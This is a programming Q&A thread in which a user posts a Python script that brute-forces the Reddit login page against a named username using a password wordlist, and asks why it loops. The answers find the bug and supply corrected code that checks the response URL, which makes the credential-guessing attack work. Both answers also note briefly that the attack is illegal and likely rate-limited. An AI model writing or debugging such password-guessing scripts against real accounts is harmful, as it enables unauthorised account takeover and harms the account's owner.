# bruteforce attack with requests - code keeps trying the same password

Tags: python, python-3.x, while-loop, python-requests

I have this piece of code and when I run it, it just repeats the same password over and over!

```
import requests

url = 'https://www.reddit.com/login/'
arq = open('C:/Users/Amel/Desktop/Python/BruteForce/wordlist.txt')
for line in arq:
    password = line.strip()
    http = requests.put(url, 
    data={'loginUsername' : 'skoolees', 'loginPassword' : password, 
    'AnimatedForm__submitButton' : 'submit'})
    content = http.content
    while url == 'https://www.reddit.com/login/':
        print('Password incorrect : ', password)
    while url == 'https://www.reddit.com':
        print('Password correct : ', password)
        break
```

Comment: your script is not repeating the same password over and over. your script gets stuck in the first while loop, and that's why it keeps printing `Password incorrect : <first line in wordlist.txt>`

Answer (score 3):

Hay Amel, you should use a `if elif` instead of `while`

You `while url == 'https://www.reddit.com/login/'` will never be evaluated at false because you do not change the value of `url`.

Furthermore, you want to check against the output, not the unchanged variable `url`

Try this instead

```
if http.url == 'https://www.reddit.com/login/':
    print('Password incorrect : ', password)
elif http.url == 'https://www.reddit.com':
    print('Password correct : ', password)
    break
```

Be aware this is not legal and forbidden by reddit code of conduct.

Comment: Thank you this is just in educational purpose so I am just trying to do some research thank you very much !!

Answer (score 0):

What is the purpose of the while loops? Have you tried to change them to `if`?

Also, you probably want to check the URL of the response (in your case `http.url`), not the variable `url`.

```
...
http = requests.put(...
...

if http.url == 'https://www.reddit.com/login/':
    print('Password incorrect : ', password)
else:
    print('Password correct : ', password)
```

---

Note: bruteforcing reddit is probably not allowed and they most likely have a ratelimiting mechanism that will stop you after a few tries.

Comment: @Skole13 feel free to [accept an answer](https://stackoverflow.com/help/someone-answers) if it helped you